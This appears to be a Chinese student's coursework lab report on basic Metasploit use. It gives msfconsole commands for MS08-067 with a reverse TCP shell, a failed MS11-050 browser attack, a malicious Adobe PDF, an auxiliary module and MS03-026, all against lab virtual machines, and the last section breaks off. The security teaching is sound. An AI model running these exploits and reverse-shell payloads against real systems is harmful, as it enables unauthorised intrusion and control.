20155302《网络对抗》Exp5 MSF基础应用
20155302《网络对抗》Exp5 MSF基础应用
实验内容
本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路。具体需要完成:
1.1一个主动攻击实践,如ms08_067; (1分)
1.2 一个针对浏览器的攻击,如ms11_050;(1分)
1.3 一个针对客户端的攻击,如Adobe;(1分)
1.4 成功应用任何一个辅助模块。(0.5分)
以上四个小实践可不限于以上示例,并要求至少有一个是和其他所有同学不一样的,否则扣除0.5分。
知识储备
(1)MSF是什么?
MSF是一套大型系统开发指南,它描述了如何用组队
模型、过程模型和应用模型来开发Client/Server结
构的应用程序,是在微软的工具和技术的基础上建
立并开发分布式企业系统应用的参考。
(2)metasploit是什么?
Metasploit是一款开源的安全漏洞检测工具,可以
帮助安全和IT专业人士识别安全性问题,验证漏洞
的缓解措施,并管理专家驱动的安全性进行评估,
提供真正的安全风险情报。这些功能包括智能开发
,代码审计,Web应用程序扫描,社会工程。团队合
作,在Metasploit和综合报告提出了他们的发现。
(3)metasploit有什么特点?
这种可以扩展的模型将负载控制,编码器,无操作
生成器和漏洞整合在一起,使 Metasploit
Framework成为一种研究高危漏洞的途径。它集成了各平台上常见的溢出漏洞和流行的shellcode,并且不断更新。最新版本的 MSF包含了750多种流行的操作系统及应用软件的漏洞,以及224个 shellcode
。作为安全工具,它在安全检测中用着不容忽视的
并为漏洞自动化探测和及时检测系统漏洞提供了有力保障。
Metasploit自带上百种漏洞,还可以在online
exploit building
demo(在线漏洞生成演示)上看到如何生成漏洞。
这使自己编写漏洞变得更简单,它势必将提升非法s
hellcode的水平,并且扩大网络阴暗面。与其相似
的专业漏洞工具,如Core
Impact和Canvas已经被许多专业领域用户使用。Met
asploit降低了使用的门槛,将其推广给大众。
实验过程
Windows服务渗透攻击——MS08-067安全漏洞
攻击机kali(ip):192.168.38.131
靶机windows XP professional(ip):192.168.38.135
在kali输入msfconsole进入控制台后依次输入以下指令:
msf > use exploit/windows/smb/ms08_067_netapi
msf exploit(ms08_067_netapi) > show payloads
msf exploit(ms08_067_netapi) > set payload generic/shell_reverse_tcp //tcp反向回连
msf exploit(ms08_067_netapi) > set LHOST 192.168.38.131 //kali的ip
msf exploit(ms08_067_netapi) > set LPORT 5302 //攻击端口
msf exploit(ms08_067_netapi) > set RHOST 192.168.38.135 //Windows XP机ip,特定漏洞端口已经固定
msf exploit(ms08_067_netapi) > set target 0 //自动选择目标系统类型,匹配度较高
msf exploit(ms08_067_netapi) > exploit //探测并攻击
连接成功!并进行攻击:
浏览器渗透攻击——MS11-050
攻击机kali(ip):192.168.38.131
Windows XP Professional SP3 简体中文(ip):192.168.38.130
与实验一类似,首先选择要使用的漏洞攻击模块:use windows/browser/ms11_050_mshtml_cobjectelement
然后使用set payload windows/meterpreter/reverse_http
进行回连
在设置完kali的攻击机地址以及端口号后进行统一资源标识符路径设置set URIPATH yxc5302
最后exploit
进行攻击!
与此同时在Windows XP的浏览器里输入http://192.168.38.130:8080/yxc20155302查看连接情况
emmm....失败了,IE浏览器弹窗阻止了本此连接?!what???这是什么操作?!我已经提前关掉了防火墙啊,可还是被IE警告错误...
再回头看看kali里面的连接情况:
连接没问题但是发送数据总是得不到响应,无法回连!为!什!么!(我觉得一方面可能是这个漏洞攻击方式太low了被电脑无情的“自查”拒绝了,另一方面也可能是系统环境搭建的有缺陷)
回到Windows这边点击错误报告的不发送,然后...
出现一行奇怪的代码之后又弹出警告,循环往复...
针对Adobe Reader软件的渗透攻击——adobe_toolbutton
攻击机kali(ip):192.168.38.131
Windows XP Professional SP3 简体中文(ip):192.168.38.130
依然是熟悉的攻击准备操作:
注意此处不同的是我们要生成一个Adobe Reader(也就是pdf)格式的文件,来通过对方靶机对于此文件的开启,来实施攻击。这有些类似于实验二的后门(不同的是pdf文件需要被对方开启才能攻击成功),也有点像现在流行的“伪装者”计算机病毒(将病毒嵌入在图片或视频中通过对方的开启来攻击对方靶机)。
在这里遇到了一个困难,那就是生成的pdf格式文件默认为隐藏文件,而我们要把他传入靶机就注定要找到它。在此我想了两个办法,一个是使用find+地址+name+"*" -print
的指令显示出隐藏文件。但是在这里失败了,并没能找到我的pdf文件。于是方法二就是因为已知文件路径,只需使用"cp"指令在当前目录下再复制出来一个就好了。
然后将pdf文件传入靶机中并打开,攻击机中查看攻击回连情况,发现成功!并可以查看靶机的信息,就可以为所欲为啦!
成功应用任何一个辅助模块
输入命令show auxiliary查看所有辅助模块
从中随便选取一个,并且info查看一下相关信息
设置攻击机kali的ip地址192.168.38.131,并且尝试攻击回连
成功!
自主渗透测试之ms03_026
攻击机kali(ip):192.168.38.131
Windows XP Professional SP3 简体中文(ip):192.168.38.130
首先在攻击机kali输入msfconsole进入控制台
msf> use exploit/windows/dcerpc/ms03_026_dcom。看到命令提示符的改变表明该命令已经运行成功。(我们在此处使用的是ms023_026一款03年的古老漏洞攻击
20155302《网络对抗》Exp5 MSF基础应用的更多相关文章
- 2018-2019 20165237网络对抗 Exp5 MSF基础应用
2018-2019 20165237网络对抗 Exp5 MSF基础应用 实验目标 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如 ...
- 2018-2019 20165221 网络对抗 Exp5 MSF基础
2018-2019 20165221 网络对抗 Exp5 MSF基础 实践内容: 重点掌握metassploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 一个主动攻击实践,如ms0 ...
- 2018-2019 20165235 网络对抗 Exp5 MSF基础
2018-2019 20165235 网络对抗 Exp5 MSF基础 1. 实践内容(3.5分) 1.1一个主动攻击实践 攻击方:kali 192.168.21.130 靶机: win7 192.16 ...
- 2018-2019 20165220 网络对抗 Exp5 MSF基础
实验任务 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms11_050:(1分) 1.3 一个针对客户端的攻击,如Adobe:(1分) 1.4 成功应用任何 ...
- 2018-2019 20165219 网络对抗 Exp5 MSF基础
实验内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_067; (1分) 1.2 一个针对浏览器的攻击,如ms ...
- 20145338 《网络对抗》 MSF基础应用
20145338<网络对抗> MSF基础应用 实验内容 ·掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路. 具体需要完成(1)一个主动攻击;(2)一个针对浏览器的攻击 ...
- 20145308 《网络对抗》 MSF基础应用 学习总结
20145308 <网络对抗> MSF基础应用 学习总结 实验内容 掌握metasploit的基本应用方式,掌握常用的三种攻击方式的思路.具体需要完成(1)一个主动攻击,如ms08_067 ...
- 20145326蔡馨熤《网络对抗》——MSF基础应用
20145326蔡馨熤<网络对抗>——MSF基础应用 实验后回答问题 用自己的话解释什么是exploit,payload,encode. exploit:起运输的作用,将数据传输到对方主机 ...
- 20155218《网络对抗》MSF基础应用
20155218<网络对抗>MSF基础应用 实验过程 1.一个主动攻击实践,如ms08_067; 首先使用 search ms08_067查询一下该漏洞: show target 查看可以 ...
- 20155304《网络对抗》MSF基础应用
20155304<网络对抗>MSF基础应用 实践内容 本实践目标是掌握metasploit的基本应用方式,重点常用的三种攻击方式的思路.具体需要完成: 1.1一个主动攻击实践,如ms08_ ...
随机推荐
- zigzag方式编码
按以下公式转换: ParameterInteger = (value << 1) ^ (value >> 31) 参数值不支持大于pow(2,31) - 1或-1 * (pow ...
- mac下/usr/local/bin No such file or directory问题解决
在对composer进行全局配置时,执行 sudo mv composer.phar /usr/local/bin/composer 时,mac报错:/usr/local/bin No such fi ...
- Expo大作战(十八)--expo如何发布成独立应用程序,打包成apk或者ipa,发布到对应应用商店
简要:本系列文章讲会对expo进行全面的介绍,本人从2017年6月份接触expo以来,对expo的研究断断续续,一路走来将近10个月,废话不多说,接下来你看到内容,讲全部来与官网 我猜去全部机翻+个人 ...
- [iOS] UICollectionView实现图片水平滚动
最新更新: 简单封装了一下代码,参考新文章:UICollectionView实现图片水平滚动 先简单看一下效果: 新博客:http://wossoneri.github.io 准备数据 首先先加入一些 ...
- LeetCode题解之Longest Palindromic Substring
1.题目描述 2.问题分析 计算每个字符所组成的字符串的回文子串. 3.代码 string longestPalindrome(string s) { ; ; bool is_odd = false ...
- Gradle 'MYasprj' project refresh failed Error:CreateProcess error=216, 该版本的 %1 与您运行的 Windows 版本不兼容
Gradle ‘MYasprj’ project refresh failed Error:CreateProcess error=216, 该版本的 %1 与您运行的 Windows 版本不兼容.请 ...
- MariaDB实现主从配置及读写分离(一)
一.主从复制方案 1. 在两台CentOS7虚拟机上分别部署MariaDB, 主数据库服务器IP为192.168.17.235, 从服务器IP为192.168.17.238. 从服务器通过调取主服务 ...
- 个人犯的一个golang routine错误
这个其实不是错误,2个写法没有区别.-2015.11.22 认识golang也不少时间了,也做过几个项目.最近发现之前用golang写的一个服务,内存涨得比较快,一直没找出来原因来.今天把疑惑发到群里 ...
- JDK5的新特性之 增强for
package cn.itcast.day19.foreach; import java.util.ArrayList; import java.util.Collection; import j ...
- 《深入理解JVM》读书笔记
目前只是整理了书的前几章,把jvm的内存划分简要说明.垃圾回收算法.垃圾回收器.常用的命令和工具进行说明.命令和工具的使用找个时间需要详细按步骤截图说明. 还有一部分内容是举例说明了一下字节码指令的样 ...